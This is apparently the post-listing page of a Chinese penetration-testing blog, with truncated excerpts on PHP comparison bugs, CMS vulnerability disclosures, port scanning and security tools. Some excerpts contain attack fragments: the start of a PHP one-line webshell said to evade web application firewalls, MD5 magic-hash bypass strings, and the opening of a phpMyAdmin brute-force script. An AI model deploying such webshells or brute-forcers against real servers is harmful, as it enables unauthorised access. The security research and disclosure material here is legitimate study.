暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

过狗过云锁一句话

mOon    原创作品     5186次查看    抢沙发    2017年12月08日

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。 今天在群里面看到一些机油讨论一些话题。 看到一个据说是过狗过云锁的一句话。 <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array(...

PHP 函数漏洞总结

mOon    渗透测试     3620次查看    抢沙发    2017年11月29日

1.MD5 compare漏洞 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 常见的payload有 0x01 md5(str)     QNKCDZO     2406...

PHP渗透中的奇淫技巧--检查相等时的漏洞

mOon    渗透测试     3832次查看    抢沙发    2017年11月29日

PHP是现在网站中最为常用的后端语言之一,是一种类型系统 动态、弱类型的面向对象式编程语言。可以嵌入HTML文本中,是目前最流行的web后端语言之一,并且可以和Web Server 如apache和nginx方便的融合。目前,已经占据了服务端市场的极大占有量。 但是,弱类型,一些方便的特性由于新手程序员的不当使用,造成了一些漏洞,这篇文章就来介绍一下一些渗透中可以用的特性。 ...

鲶鱼CMS存储XSS漏洞披露

mOon    漏洞收集     2955次查看    抢沙发    2017年11月19日

Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统。这个cms是十月我和学长小胡子一起审计的。所以在这里声明下,洞是他找的,他不善言辞,授权给我来写文章。漏洞已提交给厂商,同意公开此漏洞。 XSS漏洞点 这里的版本是V4.6.0。出问题的地方是头像上传这个地方,这个cms以前爆过一枚任意文件删除漏洞也是这里。 先注册一个普通用户 ...

Masscan及Nmap实现对阿里云ECS的外网端口监控

mOon    渗透测试     2761次查看    抢沙发    2017年11月18日

*本文原创作者:yuegui_2004,本文属于FreeBuf原创奖励计划,禁止转载 Nmap作为一个开源的互联网端口扫描及安全审计工具,大家并不陌生,许多系统及网络管理员利用它进行网络探测、端口扫描、端口服务管理等。但是在遇到大网段全端口范围的场景时,nmap的扫描能力就受到了限制,扫描周期长就成为了其弊端。 要实现外网端口监控,首先就要保证端口扫描的近实时性,对向...

C#实现多线程的方式:Task——任务

mOon    渗透编程     3055次查看    抢沙发    2017年11月17日

C#实现多线程的方式:Task——任务 简介   .NET 4包含新名称空间System.Threading.Tasks,它 包含的类抽象出了线程功能。 在后台使用ThreadPool。 任务表示应完成的某个单元的工作。 这个单元的工作可以在单独的线程中运行,也可以以同步方式启动一个任务,这需要等待主调线程。 使用任务不仅可以获得一个抽象层,还可以对底...

国产ImXSS工具开源发布(附设计文档)

mOon    神器下载     4549次查看    抢沙发    2017年11月15日

 国产ImXSS工具开源发布(附设计文档) 一、前言 ImXSS是国内首套Java研发的Xss跨站脚本测试平台。ImXSS前身是XssAPP,秉承高效、快速、稳定、易用的原则。主要用于技术研究与交流. 二、业务说明 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取...

Foosun DotNetCMS2.0登录绕过漏洞

mOon    漏洞收集     2754次查看    抢沙发    2017年11月14日

Foosun DotNetCMS2.0的源码下载地址:【传送门】 在阅读Foosun DotNetCMS2.0代码时,我们发现了这样一处: 具体细节为: 1.从${pre}_sys_User表中取出UserNum,UserName,SiteID ...

phpmyadmin枚举工具

mOon    神器下载     3820次查看    抢沙发    2017年11月09日

#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: IcySun # 脚本功能:暴力破解phpMyadmin密码 from Queue import Queue import threading,sys import requests def use(): print '#' * 50 prin...

Python3编写的CMS漏洞检测工具(含300POC)

mOon    神器下载     4900次查看    2条评论    2017年11月08日

*本文原创作者:六翼,本文属FreeBuf原创奖励计划,未经许可禁止转载 0×01 说明:  最近几年cms在网络空间中占比越来越多,黑客的攻击重心也从传统OWASP10导向通用系统漏洞挖掘,而cms类型网站整体修复周期又耗时很长,很容易被入侵。大学期间研究安全的时候接触到了bugscan,所以也想打造一个自己的cms漏洞poc管理和检测工具。 ...